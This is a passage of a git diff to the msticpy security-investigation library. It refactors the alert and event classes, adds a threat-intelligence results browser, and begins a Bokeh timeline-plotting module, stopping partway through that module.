-                host_name = self.primary_host.fqdn
-            else:
-                host_name = None
-            proc_name = (self.primary_process.ImageFile.FullPath if
-                         self.primary_process and self.primary_process.ImageFile
-                         else None)
+            host_name = self.primary_host.fqdn if self.primary_host else None
+            proc_name = (
+                self.primary_process.ImageFile.FullPath
+                if self.primary_process and self.primary_process.ImageFile
+                else None
+            )
             acct_name = self.primary_account.Name if self.primary_account else None
             path_separator = self.path_separator
-            if self.data_family == DataFamily.WindowsSecurity:
+            if self.data_family == OSFamily.Windows:
                 proc_name = escape_windows_path(proc_name)
                 path_separator = escape_windows_path(self.path_separator)
 
             dyn_query_params = {
-                'subscription_filter': self.subscription_filter(),
-                'host_filter_eq': self.host_filter(operator='=='),
-                'host_filter_neq': self.host_filter(operator='!='),
-                'host_name': host_name,
-                'account_name': acct_name,
-                'process_name': proc_name,
-                'logon_session_id': self.get_logon_id(),
-                'process_id': (self.primary_process.ProcessId if self.primary_process else None),
-                'path_separator': path_separator,
-                'data_family': self.data_family,
-                'data_environment': self.data_environment,
+                "subscription_filter": self.subscription_filter(),
+                "host_filter_eq": self.host_filter(operator="=="),
+                "host_filter_neq": self.host_filter(operator="!="),
+                "host_name": host_name,
+                "account_name": acct_name,
+                "process_name": proc_name,
+                "logon_session_id": self.get_logon_id(),
+                "process_id": (
+                    self.primary_process.ProcessId if self.primary_process else None
+                ),
+                "path_separator": path_separator,
+                "data_family": self.data_family,
+                "data_environment": self.data_environment,
             }
 
             dyn_query_params.update(self._custom_query_params)
@@ -220,178 +299,225 @@ def query_params(self):
             return {}
 
     @property
-    def data_family(self) -> DataFamily:
+    def data_family(self) -> OSFamily:
         """Return the data family of the alert for subsequent queries."""
-        if self.os_family == 'Linux':
-            return DataFamily.LinuxSecurity
-        elif self.os_family == 'Windows':
-            return DataFamily.WindowsSecurity
-        return None
+        if self.os_family == "Linux":
+            return OSFamily.Linux
+        if self.os_family == "Windows":
+            return OSFamily.Windows
+        raise ValueError("Unknown Data family.")
 
     @property
     def data_environment(self) -> DataEnvironment:
         """Return the data environment of the alert for subsequent queries."""
         if self.is_in_log_analytics:
             return DataEnvironment.LogAnalytics
-        else:
-            return DataEnvironment.Kusto
+        return DataEnvironment.Kusto
 
     @property
     def origin_time(self) -> datetime:
         """Return the datetime of event."""
         return self.TimeGenerated
 
-    def get_entity_property(self, entity_property, entity_type=None, entity=None):
+    def get_logon_id(self, account: Account = None) -> Optional[Union[str, int]]:
         """
-        Return the value of the named entity property.
+        Get the logon Id for the alert or the account, if supplied.
 
-            :param entity_property: the name of the property to return
-            :param entity_type=None: the name of the entity type (optional if entity is supplied)
-            :param entity=None: the target entity.
+        If `account` is not supplied, return the logon id
+        of the first host-logon-session or account entity.
 
-        If the entity parameter is not supplied the function will return the
-        property value of the first entity of the current alert that
-        matches the specified type and has a property of entity_property
+        Parameters
+        ----------
+        account : Account, optional
+            Account objec to use (the default is None)
 
-        """
-        if entity and entity_property in entity:
-            return entity[entity_property]
-
-        if self.entities is not None:
-            for test_entity in [entity for entity in self.entities
-                                if entity['Type'] == entity_type]:
-                if (test_entity and entity_property in test_entity and
-                        is_not_empty(test_entity[entity_property])):
-                    return test_entity[entity_property]
-        return None
+        Returns
+        -------
+        Optional[Union[str, int]]
+            The logon Id for primary account
 
-    def get_logon_id(self, account=None):
         """
-        Get the logon Id for the alert or the account, if supplied.
-
-        if the account entity is not supplied, return the logon id
-        of the first host-logon-session or account entity.
-        """
-        for session in [e for e in self.entities if
-                        e['Type'] == 'host-logon-session' or e['Type'] == 'hostlogonsession']:
-            if account is None or session['Account'] == account:
-                return session['SessionId']
+        for session in [
+            e
+            for e in self.entities
+            if e["Type"] in ["host-logon-session", "hostlogonsession"]
+        ]:
+            if account is None or session["Account"] == account:
+                return session["SessionId"]
         if account is None:
-            for acct in [e for e in self.entities if e['Type'] == 'account' and 'LogonId' in e]:
-                return acct['LogonId']
-        elif 'LogonId' in account:
-            return account['LogonId']
-        return None
-
-    def get_process_name(self, process):
-        """Return the process (filename) of the process."""
-        if isinstance(process, Process) and process.ProcessFilePath:
-            return process.ProcessFilePath
-        if 'ImageFile' in process:
-            if 'FullPath' in process['ImageFile']:
-                return process['ImageFile']['FullPath']
-            elif 'Directory' in process['ImageFile']:
-                return (process['ImageFile']['Directory'] +
-                        self.path_separator + process['ImageFile']['Name'])
+            for acct in [
+                e for e in self.entities if e["Type"] == "account" and "LogonId" in e
+            ]:
+                return acct["LogonId"]
+        elif "LogonId" in account:
+            return account["LogonId"]
         return None
 
-    def subscription_filter(self, operator='=='):
+    def subscription_filter(self, operator="=="):
         """Return a KQL subscription filter clause derived from the alert properties."""
         if self.is_in_log_analytics:
-            return 'true'
+            return "true"
         if self.is_in_azure_sub:
-            return ('AzureResourceSubscriptionId {} \'{}\''
-                    .format(operator, self._ids['AzSubscriptionId']))
+            return (
+                f"AzureResourceSubscriptionId {operator} "
+                f"'{self._ids['AzSubscriptionId']}'"
+            )
         if self.is_in_workspace:
-            return 'WorkspaceId {} \'{}\''.format(operator, self._ids['WorkspaceId'])
+            return f"WorkspaceId {operator} '{self._ids['WorkspaceId']}'"
+
         # Otherwise we default to including everything
-        return 'true'
+        return "true"
 
-    def host_filter(self, operator='=='):
+    def host_filter(self, operator="=="):
         """
         Return a KQL host filter clause derived from the alert properties.
 
             :param operator='==': the operator to use in the filter clause.
                 '==' and '!=' typically.
         """
-        if (self.is_in_log_analytics and 'SourceComputerId' in self._ids and
-                self._ids['SourceComputerId']):
-            return 'SourceComputerId {} \'{}\''.format(operator, self._ids['SourceComputerId'])
-        if (self.is_in_azure_sub and 'AzureResourceId' in self._ids and
-                self._ids['AzResourceId']):
-            return 'AzureResourceId {} \'{}\''.format(operator, self._ids['AzResourceId'])
-        if self.is_in_workspace and 'AgendId' in self._ids and self._ids['AgentId']:
-            return 'AgentId {} \'{}\''.format(operator, self._ids['AgentId'])
-
         if self.primary_host:
-            case_insens_op = '=~' if operator == '==' else '!~'
-            return 'Computer {} \'{}\''.format(case_insens_op, self.primary_host.computer)
+            case_insens_op = "=~" if operator == "==" else "!~"
+            return f"Computer {case_insens_op} '{self.primary_host.computer}'"
+
+        if (
+            self.is_in_log_analytics
+            and "SourceComputerId" in self._ids
+            and self._ids["SourceComputerId"]
+        ):
+            return f"SourceComputerId {operator} '{self._ids['SourceComputerId']}'"
+        if (
+            self.is_in_azure_sub
+            and "AzureResourceId" in self._ids
+            and self._ids["AzResourceId"]
+        ):
+            return f"AzureResourceId {operator} '{self._ids['AzResourceId']}'"
+        if self.is_in_workspace and "AgendId" in self._ids and self._ids["AgentId"]:
+            return f"AgentId {operator} '{self._ids['AgentId']}'"
         return None
 
-    def get_entities_of_type(self, entity_type='host'):
-        """Return entity collection for a give entity type."""
-        return [p for p in self.entities if p['Type'] == entity_type]
+    def get_entities_of_type(self, entity_type: str) -> List[Entity]:
+        """
+        Return entity collection for a give entity type.
+
+        Parameters
+        ----------
+        entity_type : str, optional
+            The entity type.
+
+        Returns
+        -------
+        List[Entity]
+            The entities matching `entity_type`.
+
+        """
+        class_type = Entity.ENTITY_NAME_MAP.get(entity_type, None)
+        return [
+            p
+            for p in self.entities
+            if p["Type"] == entity_type or class_type and isinstance(p, class_type)
+        ]
+
+    def get_all_entities(self) -> pd.DataFrame:
+        """
+        Return a DataFrame of the Alert or Event entities.
+
+        Returns
+        -------
+        DataFrame
+            Pandas DataFrame of the Alert or Event entities.
 
-    def to_html(self, show_entities=False):
+        """
+        entity = []
+        ent_type = []
+        for item in self.entities:
+            if "Address" in item:
+                entity.append(item["Address"])
+                ent_type.append(item["Type"])
+            elif "Url" in item:
+                entity.append(item["Url"])
+                ent_type.append(item["Type"])
+            elif "HostName" in item:
+                entity.append(item["HostName"])
+                ent_type.append(item["Type"])
+            elif "Entity" in item:
+                entity.append(item["Entity"])
+                ent_type.append(item["Type"])
+            elif item["Type"] == "account":
+                entity.append(item["Name"])
+                ent_type.append(item["Type"])
+
+        return pd.DataFrame({"Entity": entity, "Type": ent_type})
+
+    def to_html(self, show_entities: bool = False) -> str:
         """Return the item as HTML string."""
         html_doc = pd.DataFrame(self._source_data).to_html()
 
-        if 'ExtendedProperties' in self._source_data:
-            ext_prop_title = '<br/><h3>ExtendedProperties:</h3>'
+        if self._source_data is not None and "ExtendedProperties" in self._source_data:
+            ext_prop_title = "<br/><h3>ExtendedProperties:</h3>"
             ext_prop_html = pd.DataFrame(
-                pd.Series(self._source_data['ExtendedProperties'])).to_html()
+                pd.Series(self._source_data["ExtendedProperties"])
+            ).to_html()
             html_doc = html_doc + ext_prop_title + ext_prop_html
 
         if show_entities and self.entities:
-            entity_title = '<br/><h3>Entities:</h3><br/>'
-            entity_html = '<br/>'.join([self._format_entity(ent)
-                                        for ent in self.entities])
+            entity_title = "<br/><h3>Entities:</h3><br/>"
+            entity_html = "<br/>".join(
+                [self._format_entity(ent) for ent in self.entities]
+            )
             html_doc = html_doc + entity_title + entity_html
         else:
-            e_counts = Counter([ent['Type'] for ent in self.entities])
-            e_counts_str = ', '.join(
-                [f'{e}: {c}' for e, c in e_counts.items()])
-            html_doc = html_doc + f'<h3>Entity counts: </h3>{e_counts_str}'
+            e_counts = Counter([ent["Type"] for ent in self.entities])
+            e_counts_str = ", ".join([f"{e}: {c}" for e, c in e_counts.items()])
+            html_doc = html_doc + f"<h3>Entity counts: </h3>{e_counts_str}"
         return html_doc
 
-    def _format_entity(self, entity):
+    @staticmethod
+    def _format_entity(entity):
         str_entity = str(entity)
         if str_entity:
-            str_entity = str_entity.replace('\n', ', ')
+            str_entity = str_entity.replace("\n", ", ")
         return html.escape(str_entity)
 
     def _find_os_family(self):
-        """Work out which OSFamily and path separator to use from entities or file paths."""
+        """Return OSFamily and path separator to use from entities or file paths."""
+        self.path_separator = "\\"
+        self.os_family = "Windows"
+
         # Use OSFamily if any entities have this property set
-        os_family_entities = [e for e in self.entities if 'OSFamily' in e]
+        os_family_entities = [e for e in self.entities if "OSFamily" in e]
         if os_family_entities:
             for os_entity in os_family_entities:
-                if os_entity['OSFamily'] == 'Linux':
-                    self.os_family = 'Linux'
-                    self.path_separator = '/'
+                if os_entity["OSFamily"] == "Linux":
+                    self.os_family = "Linux"
+                    self.path_separator = "/"
                     break
         else:
             # Otherwise try to infer from the file paths
-            files = [e for e in self.entities if e['Type'] == 'file']
+            files = [e for e in self.entities if e["Type"] == "file"]
             if files:
                 for file in files:
-                    if 'Directory' in file and '/' in file['Directory']:
-                        self.os_family = 'Linux'
-                        self.path_separator = '/'
+                    if "Directory" in file and "/" in file["Directory"]:
+                        self.os_family = "Linux"
+                        self.path_separator = "/"
                         break
             else:
-                for proc in [e for e in self.entities
-                             if e['Type'] == 'process' and 'ImageFile' in e]:
-                    file = proc['ImageFile']
-                    if 'Directory' in file and '/' in file['Directory']:
-                        self.os_family = 'Linux'
-                        self.path_separator = '/'
+                for proc in [
+                    e
+                    for e in self.entities
+                    if e["Type"] == "process" and "ImageFile" in e
+                ]:
+                    file = proc["ImageFile"]
+                    if "Directory" in file and "/" in file["Directory"]:
+                        self.os_family = "Linux"
+                        self.path_separator = "/"
                         break
 
     @staticmethod
-    def _get_subscription_from_resource(resource_id):
+    def _get_subscription_from_resource(resource_id) -> Optional[str]:
         """Extract subscription Id from resource string."""
-        sub_regex = r'^/subscriptions/([^/]+)/'
+        sub_regex = r"^/subscriptions/([^/]+)/"
         sub_ids = re.findall(sub_regex, resource_id, re.RegexFlag.I)
         if sub_ids:
             return sub_ids[0]
+
+        return None
diff --git a/msticpy/nbtools/security_event.py b/msticpy/nbtools/security_event.py
index 057990aa2..84f9dd7bb 100644
--- a/msticpy/nbtools/security_event.py
+++ b/msticpy/nbtools/security_event.py
@@ -4,17 +4,28 @@
 # license information.
 # --------------------------------------------------------------------------
 """Module for SecurityEvent class."""
+from typing import List, Dict, Any
+
 import pandas as pd
+from deprecated.sphinx import deprecated
 
-from . entityschema import Host, Process, Account, IpAddress
-from . security_base import SecurityBase
-from . utility import export
-from .. _version import VERSION
+from ..datamodel.entities import (
+    Entity,
+    Host,
+    Process,
+    Account,
+    IpAddress,
+    HostLogonSession,
+)
+from .security_base import SecurityBase
+from ..common.utility import export
+from .._version import VERSION
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
+__author__ = "Ian Hellen"
 
 
+@deprecated(reason="Replaced by datamodel entitis", version="1.7.0")
 @export
 class SecurityEvent(SecurityBase):
     """SecurityEvent class."""
@@ -26,7 +37,6 @@ def __init__(self, src_row: pd.Series = None):
             :param src_row: Pandas series containing single security event
         """
         self._source_data = src_row
-        self._entity_set = []
 
         super().__init__(src_row=src_row)
 
@@ -35,17 +45,27 @@ def __init__(self, src_row: pd.Series = None):
 
     # Properties
     @property
-    def entities(self):
-        """Return the list of entities extracted from the event."""
-        return list(self._entity_set)
+    def entities(self) -> List[Entity]:
+        """
+        Return the list of entities extracted from the event.
+
+        Returns
+        -------
+        List[Entity]
+            The list of entities extracted from the event.
+
+        """
+        return list(self._entities)
 
     @property
-    def query_params(self):
+    def query_params(self) -> Dict[str, Any]:
         """
         Query parameters derived from alert.
 
-        Returns:
-            dict(str, str) -- Dictionary of parameter names
+        Returns
+        -------
+            Dict[str, Any]
+                Dictionary of parameter names
 
         """
         return super().query_params
@@ -58,13 +78,34 @@ def __getattr__(self, name):
         return None
 
     def _extract_entities(self, src_row):
-        if 'EventID' in src_row:
-            self._entities.append(Host(src_event=src_row))
-            event_id = str(src_row['EventID'])
-            if event_id == '4688':
-                self._entities.append(Process(src_row, role='new'))
-
-            if event_id == '4624' or event_id == '4625':
-                self._entities.append(Account(src_event=src_row, role='subject'))
-                self._entities.append(Account(src_event=src_row, role='target'))
-                self._entities.append(IpAddress(src_event=src_row))
+        if "EventID" not in src_row:
+            return
+        host = Host(src_event=src_row)
+        self._entities.append(host)
+        event_id = str(src_row["EventID"])
+        if event_id == "4688":
+            event_proc = Process(src_event=src_row, role="new")
+            self._entities.append(event_proc)
+            event_proc["Host"] = host
+            if "ParentProcess" in event_proc:
+                self._entities.append(event_proc.ParentProcess)
+                if "ImageFile" in event_proc.ParentProcess:
+                    self._entities.append(event_proc.ParentProcess.ImageFile)
+            logon_session = HostLogonSession(src_event=src_row)
+            logon_session.Host = host
+            if "Account" in event_proc:
+                logon_session.Account = event_proc.Account
+                event_proc.Account.Host = host
+                self._entities.append(event_proc.Account)
+            self._entities.append(logon_session)
+            if "ImageFile" in event_proc:
+                self._entities.append(event_proc.ImageFile)
+
+        if event_id in ("4624", "4625"):
+            subj_account = Account(src_event=src_row, role="subject")
+            subj_account.Host = host
+            self._entities.append(subj_account)
+            tgt_account = Account(src_event=src_row, role="target")
+            tgt_account.Host = host
+            self._entities.append(tgt_account)
+            self._entities.append(IpAddress(src_event=src_row))
diff --git a/msticpy/nbtools/ti_browser.py b/msticpy/nbtools/ti_browser.py
new file mode 100644
index 000000000..043bb2cca
--- /dev/null
+++ b/msticpy/nbtools/ti_browser.py
@@ -0,0 +1,195 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Threat Intel Results Browser."""
+import pprint
+from typing import List, Union
+import pandas as pd
+from IPython.display import HTML
+
+from .._version import VERSION
+from .nbwidgets import SelectItem
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def browse_results(
+    data: pd.DataFrame, severities: Union[List[str], str, None] = None, **kwargs
+) -> SelectItem:
+    """
+    Return TI Results list browser.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        TI Results data from TIProviders
+    severities : Union[List[str], str, None], optional
+        A list of the severity classes to show or the string 'all'.
+        By default these are ['warning', 'high'].
+
+    Other Parameters
+    ----------------
+    kwargs :
+        passed to SelectItem constuctor.
+
+    Returns
+    -------
+    SelectItem
+        SelectItem browser for TI Data.
+
+    """
+    if "height" not in kwargs:
+        kwargs["height"] = "300px"
+
+    if not isinstance(data, pd.DataFrame) or data.empty:
+        raise ValueError("'data' parameter is empty or is not a dataframe.")
+
+    opts = get_ti_select_options(ti_data=data, severities=severities)
+    disp_func = ti_details_display(ti_data=data)
+    if not opts and not data.empty:
+        print("No results at TI Severities 'warning' or 'high'")
+        print("Displaying only 'information' severity items.")
+        opts = get_ti_select_options(ti_data=data, severities="all")
+
+    return SelectItem(item_dict=opts, action=disp_func, **kwargs)
+
+
+def get_ti_select_options(
+    ti_data: pd.DataFrame, severities: Union[List[str], str, None] = None
+):
+    """Get SelectItem options for TI data."""
+    ti_agg_df = _create_ti_agg_list(ti_data, severities)
+    return dict(
+        ti_agg_df.reset_index()
+        .apply(
+            lambda x: (
+                f"{x.Ioc:<40} type: {x.IocType:<10}  (sev: {x.Severity})"
+                + f"  providers: {x.Providers}",
+                (x.Ioc, x.Providers),
+            ),
+            axis=1,
+        )
+        .values
+    )
+
+
+def _create_ti_agg_list(
+    ti_data: pd.DataFrame, severities: Union[List[str], str, None] = None
+):
+    """Aggregate ti results on IoC for multiple providers."""
+    if not severities:
+        severities = ["warning", "high"]
+    if severities == "all":
+        severities = ["information", "warning", "high"]
+    ti_data["Details"] = ti_data.apply(lambda x: _label_col_dict(x, "Details"), axis=1)
+
+    return (
+        ti_data[ti_data["Severity"].isin(severities)]
+        .groupby(["Ioc", "IocType", "Severity"])
+        .agg(
+            Providers=pd.NamedAgg(
+                column="Provider", aggfunc=lambda x: x.unique().tolist()
+            ),
+            Details=pd.NamedAgg(column="Details", aggfunc=lambda x: x.tolist()),
+            Responses=pd.NamedAgg(column="RawResult", aggfunc=lambda x: x.tolist()),
+            References=pd.NamedAgg(
+                column="Reference", aggfunc=lambda x: x.unique().tolist()
+            ),
+        )
+        .reset_index()
+    )
+
+
+def _label_col_dict(row: pd.Series, column: str):
+    """Add label from the Provider column to the details."""
+    if not isinstance(row[column], dict):
+        return row[column]
+    return (
+        {row.Provider: row[column]} if row.Provider not in row[column] else row[column]
+    )
+
+
+def ti_details_display(ti_data):
+    """Return TI Details display function."""
+
+    def get_ti_details(ioc_prov):
+        """Display TI records from individual TI entry."""
+        ioc, provs = ioc_prov
+        results = []
+        h2_style = "border: 1px solid;background-color: DarkGray; padding: 6px"
+        h3_style = "background-color: SteelBlue; padding: 6px"
+        results.append(f"<h2 style='{h2_style}'>{ioc}</h2>")
+        for prov in provs:
+            ioc_match = ti_data[
+                (ti_data["Ioc"] == ioc) & (ti_data["Provider"] == prov)
+            ].iloc[0]
+            results.append(
+                f"<h3 style='{h3_style}'>Type: '{ioc_match.IocType}', Provider: {prov}, "
+                + f"severity: {ioc_match.Severity}</h3>"
+            )
+            results.append("<h4>Details</h4>")
+            results.append(_ti_detail_table(ioc_match.Details))
+            results.append(
+                f"<h4>Reference: </h4><a href='{ioc_match.Reference}'>"
+                + f"{ioc_match.Reference}</a><br>"
+            )
+
+            results.append("<hr>")
+            results.append("<h4>Raw Results</h4>")
+            results.append(raw_results(ioc_match.RawResult))
+        return HTML("".join(results))
+
+    return get_ti_details
+
+
+def raw_results(raw_result: str) -> str:
+    """Create pre-formatted details for raw results."""
+    fmt_details = (
+        pprint.pformat(raw_result).replace("\n", "<br>").replace(" ", "&nbsp;")
+    )
+    return f"""
+        <details>
+        <summary> <u>Raw results from provider...</u></summary>
+        <pre  style="font-size:11px">{fmt_details}</pre>
+        </details>
+        """
+
+
+_TI_TABLE_STYLE = """
+<style>
+    .tb_ti_res {border-collapse: collapse; width: 60%; border: 1px solid #ddd !important;}
+    .cell_ti {border: 1px solid #ddd !important;
+        text-align: left !important; padding: 5px !important; height: 12px}
+    .cell_ti_first {border: 1px solid #ddd !important; width: 25%;
+        text-align: left !important; padding: 5px !important; height: 12px}
+</style>
+"""
+
+
+def _ti_detail_table(detail_dict: dict) -> str:
+    """Return table of ti details."""
+    return "".join(
+        [
+            _TI_TABLE_STYLE,
+            "<table class='tb_ti_res'>",
+            *_dict_to_html(detail_dict),
+            "</table>",
+        ]
+    )
+
+
+def _dict_to_html(detail_dict):
+    html_txt = []
+    if not isinstance(detail_dict, dict):
+        return detail_dict
+    for key, val in detail_dict.items():
+        html_txt.append(f"<tr class='cell_ti'><td class='cell_ti_first'>{key}</td>")
+        if not isinstance(val, dict):
+            html_txt.append(f"<td class='cell_ti'>{val}</td></tr>")
+        else:
+            html_txt.extend(_dict_to_html(val))
+            html_txt.append("</tr>")
+    return html_txt
diff --git a/msticpy/nbtools/timeline.py b/msticpy/nbtools/timeline.py
new file mode 100644
index 000000000..1e38bc4b9
--- /dev/null
+++ b/msticpy/nbtools/timeline.py
@@ -0,0 +1,1125 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for common display functions."""
+from datetime import datetime
+from typing import Any, Dict, Optional, List, Tuple, Set, Union
+
+import pandas as pd
+from pandas.api.types import is_datetime64_any_dtype
+from pandas.errors import OutOfBoundsDatetime
+from bokeh.io import output_notebook, show
+from bokeh.models.annotations import LegendItem
+from bokeh.models import (
+    ColumnDataSource,
+    DatetimeTickFormatter,
+    HoverTool,
+    Label,
+    LayoutDOM,
+    Legend,
+    RangeTool,
+    Title,
+)
+
+# pylint: disable=too-many-lines
+# pylint: disable=no-name-in-module
+from bokeh.palettes import viridis
+
+# pylint: enable=no-name-in-module
+from bokeh.plotting import figure, reset_output
+from bokeh.layouts import column
+
+from .._version import VERSION
+from ..common.exceptions import MsticpyParameterError
+from ..common.utility import export, check_kwargs
+from ..data.query_defns import ensure_df_datetimes
+
+# pylint: disable=unused-import
+# Importing to activate pandas accessors
+from .timeline_pd_accessor import TimeLineAccessor  # noqa F401
+
+# pylint: enable=unused-import
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# Constants
+_WRAP = 50
+_WRAP_CMDL = "WrapCmdl"
+_DEFAULT_KWARGS = [
+    "color",
+    "data",
+    "group_by",
+    "height",
+    "legend",
+    "range_tool",
+    "ref_event",
+    "ref_time",
+    "source_columns",
+    "time_column",
+    "title",
+    "width",
+    "yaxis",
+    "ref_events",
+    "ref_time_col",
+    "ref_col",
+    "ref_times",
+]
+
+_TL_KWARGS = [
+    "alert",
+    "overlay_color",
+    "overlay_data",
+    "ref_time",
+    "ygrid",
+    "xgrid",
+    "hide",
+]
+
+_TIMELINE_HELP = (
+    "https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html"
+    "#msticpy.nbtools.timeline.{plot_type}"
+)
+
+
+@export
+def display_timeline(
+    data: Union[pd.DataFrame, dict],
+    time_column: str = "TimeGenerated",
+    source_columns: list = None,
+    **kwargs,
+) -> LayoutDOM:
+    """
+    Display a timeline of events.
+
+    Parameters
+    ----------
+    data : Union[dict, pd.DataFrame]
+        Either
+        dict of data sets to plot on the timeline with the following structure::
+
+            Key (str) - Name of data set to be displayed in legend
+            Value (Dict[str, Any]) - containing:
+                data (pd.DataFrame) - Data to plot
+                time_column (str, optional) - Name of the timestamp column
+                source_columns (list[str], optional) - source columns to use
+                    in tooltips
+                color (str, optional) - color of datapoints for this data
+            If any of the last values are omitted, they default to the values
+            supplied as parameters to the function (see below)
+
+        Or
+        DataFrame as a single data set or grouped into individual
+        plot series using the `group_by` parameter
+    time_column : str, optional
+        Name of the timestamp column
+        (the default is 'TimeGenerated')
+    source_columns : list, optional
+        List of default source columns to use in tooltips
+        (the default is None)
+
+    Other Parameters
+    ----------------
+    title : str, optional
+        Title to display (the default is None)
+    alert : SecurityAlert, optional
+        Add a reference line/label using the alert time (the default is None)
+    ref_event : Any, optional
+        Add a reference line/label using the alert time (the default is None)
+    ref_time : datetime, optional
+        Add a reference line/label using `ref_time` (the default is None)
+    group_by : str
+        (where `data` is a DataFrame)
+        The column to group timelines on
+    legend: str, optional
+        "left", "right", "inline" or "none"
+        (the default is to show a legend when plotting multiple series
+        and not to show one when plotting a single series)
+    yaxis : bool, optional
+        Whether to show the yaxis and labels (default is False)
+    ygrid : bool, optional
+        Whether to show the yaxis grid (default is False)
+    xgrid : bool, optional
+        Whether to show the xaxis grid (default is True)
+    range_tool : bool, optional
+        Show the the range slider tool (default is True)
+    height : int, optional
+        The height of the plot figure
+        (the default is auto-calculated height)
+    width : int, optional
+        The width of the plot figure (the default is 900)
+    color : str
+        Default series color (default is "navy")
+    overlay_data : pd.DataFrame:
+        A second dataframe to plot as a different series.
+    overlay_color : str
+        Overlay series color (default is "green")
+    hide : bool, optional
+        If True, create but do not display the plot.
+        By default, False.
+    ref_events : pd.DataFrame, optional
+        Add references line/label using the event times in the dataframe.
+        (the default is None)
+    ref_time_col : str, optional
+        Add references line/label using the this column in `ref_events`
+        for the time value (x-axis).
+        (this defaults the value of the `time_column` parameter or 'TimeGenerated'
+        `time_column` is None)
+    ref_col : str, optional
+        The column name to use for the label from `ref_events`
+        (the default is None)
+    ref_times : List[Tuple[datetime, str]], optional
+        Add one or more reference line/label using (the default is None)
+
+    Returns
+    -------
+    LayoutDOM
+        The bokeh plot figure.
+
+    """
+    # Get args
+    check_kwargs(kwargs, _DEFAULT_KWARGS + _TL_KWARGS)
+    overlay_data: pd.DataFrame = kwargs.pop("overlay_data", None)
+    overlay_columns: list = kwargs.pop("overlay_columns", source_columns)
+    color: str = kwargs.get("color", "navy")  # don't remove this from kwargs
+    overlay_color: str = kwargs.pop("overlay_color", "green")
+
+    kwargs_sub = kwargs.copy()
+    kwargs_sub["time_column"] = time_column
+    kwargs_sub["source_columns"] = source_columns
+    kwargs_sub["ref_time"], kwargs_sub["ref_label"] = _get_ref_event_time(**kwargs)
+
+    if isinstance(data, pd.DataFrame):
+        if overlay_data is not None:
+            aggr_data = {
+                "Primary": {
+                    "data": data,
+                    "time_column": time_column,
+                    "source_columns": source_columns,
+                    "color": color,
+                },
+                "Secondary": {
+                    "data": overlay_data,
+                    "time_column": time_column,
+                    "source_columns": overlay_columns,
+                    "color": overlay_color,
+                },
+            }
+            return _display_timeline_dict(data=aggr_data, **kwargs_sub)
+
+        # Create a dictionary from a grouped or simple series
+        series_dict = _create_dict_from_grouping(
+            data=data,
+            source_columns=source_columns,
+            time_column=time_column,
+            group_by=kwargs.get("group_by", None),
+            color=kwargs.get("color", "navy"),
+        )
+        return _display_timeline_dict(data=series_dict, **kwargs_sub)
+
+    if isinstance(data, dict):
+        return _display_timeline_dict(data, **kwargs_sub)
+    return None
+
+
+_TL_VALUE_KWARGS = ["kind", "y", "x"]
+
+
+# pylint: disable=invalid-name, too-many-locals, too-many-statements, too-many-branches
+@export  # noqa: C901, MC0001
+def display_timeline_values(  # noqa: C901, MC0001
+    data: pd.DataFrame,
+    value_col: str = None,
+    time_column: str = "TimeGenerated",
+    source_columns: list = None,
+    **kwargs,
+) -> LayoutDOM:
+    """
+    Display a timeline of events.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        DataFrame as a single data set or grouped into individual
+        plot series using the `group_by` parameter
+    time_column : str, optional
+        Name of the timestamp column
+        (the default is 'TimeGenerated')
+    value_col : str
+        The column name holding the value to plot vertically
+    source_columns : list, optional
+        List of default source columns to use in tooltips
+        (the default is None)
+
+    Other Parameters
+    ----------------
+    x : str, optional
+        alias of `time_column`
+    y : str
+        an alias for `value_col`
+    title : str, optional
+        Title to display (the default is None)
+    ref_event : Any, optional
+        Add a reference line/label using the alert time (the default is None)
+    ref_time : datetime, optional
+        Add a reference line/label using `ref_time` (the default is None)
+    ref_label : str, optional
+        A label for the `ref_event` or `ref_time` reference item
+    group_by : str
+        (where `data` is a DataFrame)
+        The column to group timelines on
+    legend: str, optional
+        "left", "right", "inline" or "none"
+        (the default is to show a legend when plotting multiple series
+        and not to show one when plotting a single series)
+    yaxis : bool, optional
+        Whether to show the yaxis and labels
+    range_tool : bool, optional
+        Show the the range slider tool (default is True)
+    height : int, optional
+        The height of the plot figure
+        (the default is auto-calculated height)
+    width : int, optional
+        The width of the plot figure (the default is 900)
+    color : str
+        Default series color (default is "navy"). This is overridden by
+        automatic color assignments if plotting a grouped chart
+    kind : Union[str, List[str]]
+        one or more glyph types to plot., optional
+        Supported types are "circle", "line" and "vbar" (default is "vbar")
+    hide : bool, optional
+        If True, create but do not display the plot.
+        By default, False.
+    ref_events : pd.DataFrame, optional
+        Add references line/label using the event times in the dataframe.
+        (the default is None)
+    ref_time_col : str, optional
+        Add references line/label using the this column in `ref_events`
+        for the time value (x-axis).
+        (this defaults the value of the `time_column` parameter or 'TimeGenerated'
+        `time_column` is None)
+    ref_col : str, optional
+        The column name to use for the label from `ref_events`
+        (the default is None)
+    ref_times : List[Tuple[datetime, str]], optional
+        Add one or more reference line/label using (the default is None)
+
+    Returns
+    -------
+    LayoutDOM
+        The bokeh plot figure.
+
+    """
+    check_kwargs(kwargs, _DEFAULT_KWARGS + _TL_VALUE_KWARGS + ["y"])
+
+    if data is None or not isinstance(data, pd.DataFrame) or data.empty:
+        print("No data to plot.")
+        return figure()
+
+    reset_output()
+    output_notebook()
+    height: int = kwargs.pop("height", None)
+    width: int = kwargs.pop("width", 900)
+    title: str = kwargs.pop("title", None)
+    time_column = kwargs.get("x", time_column)
+    group_by: str = kwargs.get("group_by", None)
+    show_yaxis: bool = kwargs.pop("yaxis", True)
+    show_range: bool = kwargs.pop("range_tool", True)
+    color: str = kwargs.get("color", "navy")
+    legend_pos: str = kwargs.pop("legend", None)
+    kind: Any = kwargs.pop("kind", ["vbar"])
+    plot_kinds = kind if isinstance(kind, list) else [kind]
+    hide: bool = kwargs.pop("hide", False)
+    ref_events: pd.DataFrame = kwargs.pop("ref_events", None)
+    ref_time_col: str = kwargs.pop("ref_time_col", time_column or "TimeGenerated")
